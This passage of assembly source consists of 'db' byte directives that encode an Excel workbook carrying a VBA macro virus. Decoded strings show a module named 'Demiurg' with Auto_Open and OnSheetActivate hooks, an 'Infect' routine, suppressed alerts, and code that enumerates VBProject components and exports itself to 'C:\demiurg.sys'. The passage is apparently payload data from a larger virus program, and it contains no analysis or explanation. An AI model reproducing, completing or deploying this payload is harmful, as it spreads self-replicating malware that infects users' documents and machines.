db 041h, 000h, 072h, 000h, 062h, 000h, 065h, 000h
db 069h, 000h, 074h, 000h, 073h, 000h, 06Dh, 000h
db 061h, 000h, 070h, 000h, 070h, 000h, 065h, 0E6h
db 01Fh, 000h, 024h, 000h, 002h, 001h, 007h, 000h
db 000h, 000h, 0E6h, 008h, 0FFh, 0E6h, 024h, 000h
db 02Bh, 000h, 000h, 000h, 0CAh, 003h, 0E6h, 006h
db 000h, 054h, 000h, 061h, 000h, 062h, 000h, 065h
db 000h, 06Ch, 000h, 06Ch, 000h, 065h, 000h, 031h
db 0E6h, 031h, 000h, 012h, 000h, 002h, 001h, 006h
db 000h, 000h, 000h, 004h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 024h, 000h, 03Bh, 000h, 000h
db 000h, 0BFh, 003h, 0E6h, 006h, 000h, 044h, 000h
db 065h, 000h, 06Dh, 000h, 069h, 000h, 075h, 000h
db 072h, 000h, 067h, 0E6h, 033h, 000h, 010h, 000h
db 002h, 001h, 008h, 000h, 000h, 000h, 0E6h, 008h
db 0FFh, 0E6h, 024h, 000h, 04Ah, 000h, 000h, 000h
db 01Fh, 007h, 0E6h, 006h, 000h, 05Fh, 000h, 056h
db 000h, 042h, 000h, 041h, 000h, 05Fh, 000h, 050h
db 000h, 052h, 000h, 04Fh, 000h, 04Ah, 000h, 045h
db 000h, 043h, 000h, 054h, 0E6h, 029h, 000h, 01Ah
db 000h, 002h, 000h, 0E6h, 00Ch, 0FFh, 0E6h, 024h
db 000h, 067h, 000h, 000h, 000h, 059h, 00Ch, 0E6h
db 006h, 000h, 0E6h, 028h, 0FFh, 028h, 000h, 000h
db 000h, 002h, 000h, 053h, 04Ch, 0E6h, 004h, 0FFh
db 000h, 000h, 001h, 000h, 053h, 010h, 0E6h, 004h
db 0FFh, 000h, 000h, 001h, 000h, 053h, 094h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 002h, 03Ch, 0E6h
db 004h, 0FFh, 000h, 000h, 0FFh, 0FFh, 001h, 001h
db 0E6h, 004h, 000h, 001h, 000h, 04Eh, 000h, 030h
db 000h, 07Bh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 032h, 000h, 030h, 000h, 038h, 000h, 031h
db 000h, 039h, 000h, 02Dh, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 02Dh
db 000h, 043h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 034h
db 000h, 036h, 000h, 07Dh, 0E6h, 007h, 000h, 0DFh
db 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
db 038h, 000h, 000h, 000h, 002h, 081h, 0FEh, 0E6h
db 009h, 0FFh, 028h, 0E6h, 005h, 000h, 0FFh, 0FFh
db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 074h, 000h
db 020h, 000h, 01Dh, 000h, 000h, 000h, 024h, 000h
db 000h, 000h, 0E6h, 004h, 0FFh, 048h, 0E6h, 005h
db 000h, 0FFh, 0FFh, 000h, 000h, 001h, 0E6h, 007h
db 000h, 0E6h, 00Ch, 0FFh, 0E6h, 004h, 000h, 0E6h
db 010h, 0FFh, 0E6h, 004h, 000h, 0E6h, 010h, 0FFh
db 0E6h, 008h, 000h, 0E6h, 008h, 0FFh, 0E6h, 004h
db 000h, 0E6h, 01Eh, 0FFh, 04Dh, 045h, 000h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 000h, 000h
db 0E6h, 004h, 0FFh, 001h, 001h, 008h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
db 001h, 0A7h, 0B0h, 000h, 041h, 074h, 074h, 072h
db 069h, 062h, 075h, 074h, 000h, 065h, 020h, 056h
db 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h, 020h
db 03Dh, 020h, 022h, 044h, 069h, 065h, 000h, 073h
db 065h, 041h, 072h, 062h, 065h, 069h, 074h, 000h
db 073h, 06Dh, 061h, 070h, 070h, 065h, 022h, 00Dh
db 022h, 00Ah, 00Ah, 0A0h, 042h, 061h, 073h, 002h
db 0A0h, 030h, 07Bh, 000h, 030h, 030h, 030h, 032h
db 030h, 038h, 031h, 039h, 0EAh, 02Dh, 000h, 010h
db 030h, 003h, 008h, 043h, 000h, 014h, 002h, 012h
db 001h, 024h, 020h, 030h, 030h, 034h, 036h, 07Dh
db 00Dh, 07Ch, 043h, 072h, 040h, 065h, 061h, 074h
db 061h, 062h, 06Ch, 001h, 086h, 046h, 010h, 061h
db 06Ch, 073h, 065h, 00Ch, 05Eh, 050h, 072h, 065h
db 020h, 064h, 065h, 063h, 06Ch, 061h, 000h, 006h
db 049h, 064h, 011h, 000h, 090h, 054h, 072h, 075h
db 00Dh, 022h, 045h, 078h, 070h, 008h, 06Fh, 073h
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 000h
db 06Ch, 061h, 074h, 065h, 044h, 065h, 072h, 069h
db 006h, 076h, 002h, 024h, 011h, 065h, 043h, 075h
db 073h, 074h, 06Fh, 018h, 06Dh, 069h, 07Ah, 004h
db 044h, 003h, 032h, 0E6h, 036h, 000h, 001h, 016h
db 001h, 000h, 000h, 0B6h, 000h, 0FFh, 0FFh, 001h
db 001h, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 034h, 000h
db 010h, 000h, 000h, 000h, 003h, 000h, 000h, 000h
db 005h, 000h, 000h, 000h, 007h, 000h, 000h, 000h
db 0E6h, 008h, 0FFh, 001h, 001h, 008h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 078h, 000h, 000h, 000h
db 0DEh, 000h, 000h, 000h, 0AFh, 002h, 000h, 000h
db 0F5h, 001h, 000h, 000h, 0E6h, 004h, 0FFh, 0E6h
db 004h, 000h, 001h, 000h, 000h, 000h, 0B5h, 031h
db 0B9h, 031h, 000h, 000h, 0FFh, 0FFh, 023h, 000h
db 000h, 000h, 088h, 000h, 000h, 000h, 008h, 0E6h
db 020h, 000h, 0FFh, 0FFh, 000h, 000h, 0CBh, 002h
db 000h, 000h, 0D6h, 000h, 000h, 000h, 0D6h, 000h
db 000h, 000h, 01Fh, 003h, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 0DFh, 000h, 0FFh
db 0FFh, 0E6h, 004h, 000h, 00Ch, 000h, 0E6h, 080h
db 0FFh, 028h, 000h, 000h, 000h, 002h, 000h, 053h
db 04Ch, 0E6h, 004h, 0FFh, 000h, 000h, 001h, 000h
db 053h, 010h, 0E6h, 004h, 0FFh, 000h, 000h, 001h
db 000h, 053h, 094h, 0E6h, 004h, 0FFh, 0E6h, 004h
db 000h, 002h, 03Ch, 0E6h, 004h, 0FFh, 000h, 000h
db 0FFh, 0FFh, 001h, 001h, 0E6h, 004h, 000h, 001h
db 000h, 04Eh, 000h, 030h, 000h, 07Bh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 032h, 000h, 030h
db 000h, 038h, 000h, 032h, 000h, 030h, 000h, 02Dh
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 02Dh, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 02Dh, 000h, 043h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 02Dh, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 030h, 000h, 030h, 000h, 030h
db 000h, 030h, 000h, 034h, 000h, 036h, 000h, 07Dh
db 0E6h, 007h, 000h, 0DFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 001h, 001h, 038h, 000h, 000h, 000h
db 002h, 081h, 0FEh, 0E6h, 009h, 0FFh, 028h, 0E6h
db 005h, 000h, 0FFh, 0FFh, 0E6h, 008h, 000h, 0E6h
db 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h, 000h
db 000h, 024h, 000h, 000h, 000h, 0E6h, 004h, 0FFh
db 048h, 0E6h, 005h, 000h, 0FFh, 0FFh, 000h, 000h
db 001h, 0E6h, 007h, 000h, 0E6h, 00Ch, 0FFh, 0E6h
db 004h, 000h, 0E6h, 010h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 010h, 0FFh, 0E6h, 008h, 000h, 0E6h, 008h
db 0FFh, 0E6h, 004h, 000h, 0E6h, 01Eh, 0FFh, 04Dh
db 045h, 000h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h
db 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 001h, 001h, 0E6h, 040h, 000h, 0FEh, 0CAh, 001h
db 000h, 000h, 000h, 0E6h, 004h, 0FFh, 001h, 001h
db 008h, 000h, 000h, 000h, 0E6h, 004h, 0FFh, 078h
db 000h, 000h, 000h, 001h, 09Ch, 0B0h, 000h, 041h
db 074h, 074h, 072h, 069h, 062h, 075h, 074h, 000h
db 065h, 020h, 056h, 042h, 05Fh, 04Eh, 061h, 06Dh
db 000h, 065h, 020h, 03Dh, 020h, 022h, 054h, 061h
db 062h, 000h, 065h, 06Ch, 06Ch, 065h, 031h, 022h
db 00Dh, 00Ah, 011h, 00Ah, 0F8h, 042h, 061h, 073h
db 002h, 07Ch, 030h, 07Bh, 030h, 000h, 030h, 030h
db 032h, 030h, 038h, 032h, 030h, 02Dh, 03Bh, 000h
db 020h, 004h, 008h, 043h, 000h, 014h, 002h, 01Ch
db 001h, 024h, 030h, 030h, 008h, 034h, 036h, 07Dh
db 00Dh, 07Ch, 043h, 072h, 065h, 061h, 010h, 074h
db 061h, 062h, 06Ch, 001h, 086h, 046h, 061h, 06Ch
db 004h, 073h, 065h, 00Ch, 0BCh, 050h, 072h, 065h
db 064h, 065h, 048h, 063h, 06Ch, 061h, 000h, 006h
db 049h, 064h, 000h, 087h, 054h, 004h, 072h, 075h
db 00Dh, 022h, 045h, 078h, 070h, 06Fh, 073h, 002h
db 065h, 014h, 01Ch, 054h, 065h, 06Dh, 070h, 06Ch
db 061h, 080h, 074h, 065h, 044h, 065h, 072h, 069h
db 076h, 002h, 024h, 001h, 011h, 065h, 043h, 075h
db 073h, 074h, 06Fh, 06Dh, 069h, 006h, 07Ah, 004h
db 088h, 003h, 032h, 000h, 001h, 016h, 001h, 000h
db 001h, 0B6h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 034h, 000h, 010h, 000h
db 000h, 000h, 003h, 000h, 000h, 000h, 005h, 000h
db 000h, 000h, 007h, 000h, 000h, 000h, 0E6h, 008h
db 0FFh, 001h, 001h, 008h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 078h, 000h, 000h, 000h, 0DEh, 000h
db 000h, 000h, 037h, 003h, 000h, 000h, 0A5h, 001h
db 000h, 000h, 0E6h, 004h, 0FFh, 002h, 000h, 000h
db 000h, 001h, 000h, 000h, 000h, 0B5h, 031h, 0BBh
db 031h, 000h, 000h, 0FFh, 0FFh, 003h, 0E6h, 007h
db 000h, 002h, 0E6h, 020h, 000h, 0FFh, 0FFh, 000h
db 000h, 053h, 003h, 000h, 000h, 0D6h, 000h, 000h
db 000h, 0D6h, 000h, 000h, 000h, 0B7h, 005h, 0E6h
db 004h, 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h
db 0DFh, 000h, 0FFh, 0FFh, 0E6h, 006h, 000h, 0E6h
db 080h, 0FFh, 028h, 0E6h, 005h, 000h, 002h, 03Ch
db 00Ch, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h, 002h
db 03Ch, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 002h
db 03Ch, 004h, 000h, 0FFh, 0FFh, 0E6h, 004h, 000h
db 002h, 03Ch, 008h, 000h, 0FFh, 0FFh, 000h, 000h
db 0FFh, 0FFh, 001h, 001h, 0E6h, 006h, 000h, 0E8h
db 005h, 0C0h, 038h, 003h, 000h, 0DFh, 0E6h, 004h
db 000h, 050h, 000h, 000h, 000h, 001h, 001h, 010h
db 001h, 000h, 000h, 00Bh, 012h, 01Eh, 002h, 080h
db 0E6h, 006h, 000h, 060h, 0E6h, 004h, 000h, 0E6h
db 008h, 0FFh, 0E6h, 004h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh, 000h, 000h
db 003h, 000h, 003h, 000h, 000h, 000h, 084h, 000h
db 000h, 001h, 0E6h, 006h, 000h, 080h, 000h, 000h
db 000h, 0E6h, 004h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0C0h, 000h, 000h, 000h, 028h, 0E6h
db 007h, 000h, 0E6h, 004h, 0FFh, 068h, 0FFh, 040h
db 000h, 0E6h, 00Ah, 0FFh, 001h, 000h, 003h, 000h
db 003h, 000h, 003h, 000h, 084h, 000h, 000h, 001h
db 0E6h, 006h, 000h, 00Bh, 012h, 02Ah, 002h, 0E6h
db 004h, 0FFh, 002h, 000h, 000h, 060h, 0E6h, 004h
db 000h, 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 0E6h
db 004h, 0FFh, 0E6h, 004h, 000h, 0E6h, 00Ah, 0FFh
db 002h, 000h, 00Dh, 000h, 00Dh, 000h, 006h, 000h
db 084h, 000h, 000h, 001h, 000h, 000h, 004h, 000h
db 0E6h, 006h, 0FFh, 010h, 000h, 000h, 000h, 040h
db 0E6h, 007h, 000h, 080h, 000h, 000h, 000h, 0E6h
db 004h, 0FFh, 002h, 083h, 01Ch, 002h, 0E6h, 004h
db 0FFh, 008h, 000h, 0FFh, 0FFh, 000h, 001h, 0E6h
db 004h, 000h, 0E6h, 006h, 0FFh, 0E6h, 004h, 000h
db 0E6h, 008h, 0FFh, 0E6h, 004h, 000h, 01Dh, 000h
db 000h, 000h, 024h, 000h, 000h, 000h, 0E6h, 004h
db 0FFh, 0F0h, 000h, 000h, 000h, 002h, 000h, 002h
db 0E6h, 00Fh, 000h, 0E6h, 010h, 0FFh, 080h, 000h
db 000h, 000h, 0E6h, 018h, 0FFh, 0D8h, 0E6h, 00Bh
db 000h, 008h, 000h, 004h, 000h, 0E6h, 004h, 0FFh
db 0E6h, 004h, 000h, 0E6h, 018h, 0FFh, 004h, 000h
db 040h, 000h, 000h, 000h, 04Dh, 045h, 000h, 000h
db 0E6h, 006h, 0FFh, 0E6h, 004h, 000h, 0FFh, 0FFh
db 0E6h, 004h, 000h, 0FFh, 0FFh, 001h, 001h, 0E6h
db 040h, 000h, 0FEh, 0CAh, 001h, 000h, 010h, 000h
db 022h, 081h, 008h, 000h, 006h, 000h, 00Ch, 0E6h
db 006h, 000h, 081h, 008h, 004h, 012h, 000h, 000h
db 000h, 008h, 000h, 000h, 000h, 004h, 081h, 008h
db 000h, 002h, 000h, 000h, 000h, 020h, 000h, 000h
db 000h, 022h, 081h, 008h, 000h, 006h, 000h, 00Ch
db 000h, 040h, 0E6h, 004h, 000h, 081h, 008h, 004h
db 00Ah, 000h, 000h, 000h, 048h, 0E6h, 004h, 000h
db 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh
db 000h, 081h, 008h, 004h, 026h, 000h, 000h, 000h
db 058h, 0E6h, 004h, 000h, 081h, 008h, 004h, 02Eh
db 000h, 000h, 000h, 080h, 0E6h, 004h, 000h, 080h
db 009h, 0E6h, 005h, 000h, 0E6h, 004h, 0FFh, 000h
db 081h, 008h, 008h, 01Eh, 000h, 000h, 000h, 0B0h
db 0E6h, 004h, 000h, 081h, 008h, 00Ch, 02Ch, 000h
db 000h, 000h, 0D0h, 0E6h, 004h, 000h, 081h, 008h
db 008h, 00Ah, 0E6h, 004h, 000h, 001h, 000h, 000h
db 000h, 080h, 009h, 0E6h, 005h, 000h, 0E6h, 004h
db 0FFh, 000h, 081h, 008h, 004h, 026h, 000h, 000h
db 000h, 010h, 001h, 000h, 000h, 000h, 081h, 008h
db 004h, 00Ah, 000h, 000h, 000h, 038h, 001h, 000h
db 000h, 004h, 081h, 008h, 000h, 002h, 000h, 000h
db 000h, 048h, 001h, 000h, 000h, 0E6h, 004h, 0FFh
db 001h, 001h, 058h, 001h, 000h, 000h, 08Fh, 004h
db 0E6h, 006h, 000h, 0AEh, 000h, 006h, 000h, 049h
db 06Eh, 066h, 065h, 063h, 074h, 020h, 000h, 020h
db 002h, 028h, 000h, 022h, 002h, 0E6h, 006h, 0FFh
db 06Ch, 000h, 0FFh, 0FFh, 058h, 000h, 000h, 000h
db 0AFh, 000h, 020h, 000h, 026h, 002h, 028h, 000h
db 028h, 002h, 0FFh, 0FFh, 015h, 002h, 000h, 000h
db 06Ch, 000h, 0FFh, 0FFh, 038h, 000h, 000h, 000h
db 08Fh, 004h, 080h, 0E6h, 005h, 000h, 0AFh, 000h
db 020h, 000h, 020h, 002h, 028h, 000h, 02Ch, 002h
db 0E6h, 006h, 0FFh, 020h, 000h, 032h, 002h, 021h
db 000h, 008h, 001h, 020h, 000h, 032h, 002h, 021h
db 000h, 008h, 001h, 01Bh, 000h, 0A4h, 000h, 001h
db 000h, 024h, 020h, 0FCh, 000h, 003h, 000h, 024h
db 000h, 030h, 002h, 001h, 000h, 027h, 000h, 02Eh
db 002h, 000h, 000h, 0AEh, 000h, 001h, 000h, 031h
db 000h, 024h, 000h, 030h, 002h, 001h, 000h, 020h
db 000h, 02Eh, 002h, 007h, 000h, 020h, 000h, 02Eh
db 002h, 0AEh, 000h, 001h, 000h, 039h, 000h, 024h
db 000h, 030h, 002h, 001h, 000h, 007h, 000h, 004h
db 000h, 094h, 000h, 046h, 000h, 075h, 000h, 067h
db 000h, 000h, 0F0h, 0F7h, 000h, 020h, 000h, 034h
db 002h, 0F6h, 000h, 0A4h, 000h, 001h, 000h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
db 000h, 038h, 002h, 021h, 000h, 03Ah, 002h, 08Bh
db 000h, 000h, 000h, 020h, 000h, 034h, 002h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 025h
db 000h, 038h, 002h, 001h, 000h, 021h, 000h, 008h
db 001h, 0AEh, 000h, 007h, 000h, 044h, 065h, 06Dh
db 069h, 075h, 072h, 067h, 000h, 005h, 000h, 094h
db 000h, 046h, 000h, 075h, 000h, 067h, 000h, 0F8h
db 000h, 000h, 000h, 0F7h, 000h, 020h, 000h, 034h
db 002h, 0F6h, 000h, 0C0h, 000h, 000h, 0A0h, 048h
db 037h, 044h, 000h, 0AEh, 000h, 00Eh, 000h, 043h
db 03Ah, 05Ch, 064h, 065h, 06Dh, 069h, 075h, 072h
db 067h, 02Eh, 073h, 079h, 073h, 01Dh, 000h, 020h
db 000h, 032h, 002h, 021h, 000h, 036h, 002h, 021h
db 000h, 038h, 002h, 042h, 040h, 03Ch, 002h, 001h
db 000h, 000h, 000h, 020h, 000h, 032h, 002h, 042h
db 040h, 03Eh, 002h, 0E6h, 004h, 000h, 021h, 000h
db 000h, 0A0h, 06Ch, 000h, 0FFh, 0FFh, 0A8h, 000h
db 000h, 000h, 0E6h, 004h, 0FFh, 0A8h, 000h, 000h
db 000h, 001h, 064h, 0B1h, 000h, 041h, 074h, 074h
db 072h, 069h, 062h, 075h, 074h, 000h, 065h, 020h
db 056h, 042h, 05Fh, 04Eh, 061h, 06Dh, 000h, 065h
db 020h, 03Dh, 020h, 022h, 044h, 065h, 06Dh, 000h
db 069h, 075h, 072h, 067h, 022h, 00Dh, 00Ah, 053h
db 000h, 075h, 062h, 020h, 041h, 075h, 074h, 06Fh
db 05Fh, 000h, 04Fh, 070h, 065h, 06Eh, 028h, 029h
db 00Dh, 00Ah, 002h, 020h, 000h, 000h, 041h, 070h
db 070h, 06Ch, 069h, 063h, 000h, 061h, 074h, 069h
db 06Fh, 06Eh, 02Eh, 04Fh, 06Eh, 000h, 053h, 068h
db 065h, 065h, 074h, 041h, 063h, 074h, 018h, 069h
db 076h, 061h, 000h, 08Ah, 000h, 07Ah, 049h, 06Eh
db 066h, 008h, 065h, 063h, 074h, 000h, 078h, 045h
db 06Eh, 064h, 020h, 00Fh, 000h, 080h, 003h, 08Ah
db 003h, 02Ah, 011h, 084h, 044h, 069h, 073h, 070h
db 000h, 06Ch, 061h, 079h, 041h, 06Ch, 065h, 072h
db 074h, 002h, 073h, 000h, 07Eh, 046h, 061h, 06Ch
db 073h, 065h, 00Dh, 002h, 00Ah, 003h, 06Bh, 06Ch
db 061h, 073h, 074h, 063h, 068h, 004h, 061h, 072h
db 000h, 017h, 041h, 073h, 063h, 028h, 04Dh, 010h
db 069h, 064h, 024h, 028h, 002h, 06Ch, 065h, 057h
db 06Fh, 080h, 072h, 06Bh, 062h, 06Fh, 06Fh, 06Bh
db 02Eh, 001h, 0B5h, 018h, 02Ch, 020h, 04Ch, 000h
db 09Fh, 010h, 018h, 029h, 02Ch, 020h, 044h, 031h
db 029h, 004h, 0B7h, 049h, 066h, 020h, 001h, 043h
db 022h, 080h, 031h, 022h, 029h, 020h, 03Ch, 03Dh
db 020h, 006h, 05Ah, 05Eh, 041h, 080h, 053h, 006h
db 006h, 000h, 00Ch, 002h, 012h, 039h, 000h, 012h
db 054h, 000h, 068h, 065h, 06Eh, 020h, 045h, 078h
db 069h, 074h, 007h, 003h, 063h, 083h, 048h, 081h
db 080h, 046h, 06Fh, 072h, 020h, 069h, 041h, 000h
db 049h, 031h, 020h, 054h, 06Fh, 020h, 08Ch, 03Ah
db 056h, 020h, 042h, 050h, 072h, 06Fh, 06Ah, 080h
db 080h, 02Eh, 056h, 000h, 042h, 043h, 06Fh, 06Dh
db 070h, 06Fh, 06Eh, 065h, 000h, 06Eh, 074h, 073h
db 02Eh, 063h, 06Fh, 075h, 06Eh, 07Eh, 074h, 087h
db 020h, 081h, 022h, 081h, 047h, 081h, 09Bh, 007h
db 065h, 093h, 01Dh, 028h, 0DCh, 069h, 029h, 002h
db 072h, 000h, 038h, 006h, 0CDh, 020h, 08Ch, 04Dh
db 081h, 027h, 081h, 081h, 001h, 04Eh, 065h, 078h
db 074h, 020h, 069h, 085h, 09Eh, 005h, 023h, 04Dh
db 049h, 000h, 029h, 072h, 074h, 020h, 028h, 022h
db 010h, 043h, 03Ah, 05Ch, 064h, 083h, 07Eh, 02Eh
db 073h, 079h, 08Ch, 073h, 022h, 085h, 07Bh, 0CBh
db 028h, 053h, 061h, 076h, 040h, 067h, 001h, 0C6h
db 076h, 0E6h, 021h, 000h, 0CCh, 061h, 05Eh, 000h
db 000h, 001h, 000h, 0FFh, 007h, 00Ch, 000h, 000h
db 009h, 004h, 000h, 000h, 0E4h, 004h, 001h, 0E6h
db 009h, 000h, 001h, 000h, 005h, 000h, 002h, 000h
db 01Ah, 001h, 02Ah, 000h, 05Ch, 000h, 047h, 000h
db 07Bh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 032h, 000h, 030h, 000h, 034h, 000h, 045h, 000h
db 046h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 043h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 034h, 000h
db 036h, 000h, 07Dh, 000h, 023h, 000h, 033h, 000h
db 02Eh, 000h, 030h, 000h, 023h, 000h, 039h, 000h
db 023h, 000h, 043h, 000h, 03Ah, 000h, 05Ch, 000h
db 050h, 000h, 052h, 000h, 04Fh, 000h, 047h, 000h
db 052h, 000h, 041h, 000h, 04Dh, 000h, 04Dh, 000h
db 045h, 000h, 05Ch, 000h, 047h, 000h, 045h, 000h
db 04Dh, 000h, 045h, 000h, 049h, 000h, 04Eh, 000h
db 053h, 000h, 041h, 000h, 04Dh, 000h, 045h, 000h
db 020h, 000h, 044h, 000h, 041h, 000h, 054h, 000h
db 045h, 000h, 049h, 000h, 045h, 000h, 04Eh, 000h
db 05Ch, 000h, 04Dh, 000h, 049h, 000h, 043h, 000h
db 052h, 000h, 04Fh, 000h, 053h, 000h, 04Fh, 000h
db 046h, 000h, 054h, 000h, 020h, 000h, 053h, 000h
db 048h, 000h, 041h, 000h, 052h, 000h, 045h, 000h
db 044h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
db 041h, 000h, 05Ch, 000h, 056h, 000h, 042h, 000h
db 041h, 000h, 033h, 000h, 033h, 000h, 032h, 000h
db 02Eh, 000h, 044h, 000h, 04Ch, 000h, 04Ch, 000h
db 023h, 000h, 056h, 000h, 069h, 000h, 073h, 000h
db 075h, 000h, 061h, 000h, 06Ch, 000h, 020h, 000h
db 042h, 000h, 061h, 000h, 073h, 000h, 069h, 000h
db 063h, 000h, 020h, 000h, 046h, 000h, 06Fh, 000h
db 072h, 000h, 020h, 000h, 041h, 000h, 070h, 000h
db 070h, 000h, 06Ch, 000h, 069h, 000h, 063h, 000h
db 061h, 000h, 074h, 000h, 069h, 000h, 06Fh, 000h
db 06Eh, 000h, 073h, 0E6h, 00Dh, 000h, 004h, 001h
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
db 030h, 000h, 038h, 000h, 031h, 000h, 033h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
db 07Dh, 000h, 023h, 000h, 031h, 000h, 02Eh, 000h
db 032h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 050h, 000h
db 072h, 000h, 06Fh, 000h, 067h, 000h, 072h, 000h
db 061h, 000h, 06Dh, 000h, 06Dh, 000h, 065h, 000h
db 05Ch, 000h, 04Dh, 000h, 069h, 000h, 063h, 000h
db 072h, 000h, 06Fh, 000h, 073h, 000h, 06Fh, 000h
db 066h, 000h, 074h, 000h, 020h, 000h, 04Fh, 000h
db 066h, 000h, 066h, 000h, 069h, 000h, 063h, 000h
db 065h, 000h, 05Ch, 000h, 04Fh, 000h, 066h, 000h
db 066h, 000h, 069h, 000h, 063h, 000h, 065h, 000h
db 05Ch, 000h, 045h, 000h, 058h, 000h, 043h, 000h
db 045h, 000h, 04Ch, 000h, 038h, 000h, 02Eh, 000h
db 04Fh, 000h, 04Ch, 000h, 042h, 000h, 023h, 000h
db 04Dh, 000h, 069h, 000h, 063h, 000h, 072h, 000h
db 06Fh, 000h, 073h, 000h, 06Fh, 000h, 066h, 000h
db 074h, 000h, 020h, 000h, 045h, 000h, 078h, 000h
db 063h, 000h, 065h, 000h, 06Ch, 000h, 020h, 000h
db 038h, 000h, 02Eh, 000h, 030h, 000h, 020h, 000h
db 04Fh, 000h, 062h, 000h, 06Ah, 000h, 065h, 000h
db 063h, 000h, 074h, 000h, 020h, 000h, 04Ch, 000h
db 069h, 000h, 062h, 000h, 072h, 000h, 061h, 000h
db 072h, 000h, 079h, 0E6h, 00Dh, 000h, 0B8h, 000h
db 02Ah, 000h, 05Ch, 000h, 047h, 000h, 07Bh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 032h, 000h
db 030h, 000h, 034h, 000h, 033h, 000h, 030h, 000h
db 02Dh, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 02Dh, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 02Dh, 000h, 043h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 02Dh, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 030h, 000h, 030h, 000h
db 030h, 000h, 030h, 000h, 034h, 000h, 036h, 000h
db 07Dh, 000h, 023h, 000h, 032h, 000h, 02Eh, 000h
db 030h, 000h, 023h, 000h, 030h, 000h, 023h, 000h
db 043h, 000h, 03Ah, 000h, 05Ch, 000h, 057h, 000h
db 049h, 000h, 04Eh, 000h, 044h, 000h, 04Fh, 000h
db 057h, 000h, 053h, 000h, 05Ch, 000h, 053h, 000h
db 059h, 000h, 053h, 000h, 054h, 000h, 045h, 000h
db 04Dh, 000h, 05Ch, 000h, 053h, 000h, 054h, 000h
db 044h, 000h, 04Fh, 000h, 04Ch, 000h, 045h, 000h
db 032h, 000h, 02Eh, 000h, 054h, 000h, 04Ch, 000h
db 042h, 000h, 023h, 000h, 04Fh, 000h, 04Ch, 000h
db 045h, 000h, 020h, 000h, 041h, 000h, 075h, 000h
db 074h, 000h, 06Fh, 000h, 06Dh, 000h, 061h, 000h
db 074h, 000h, 069h, 000h, 06Fh, 000h, 06Eh, 0E6h
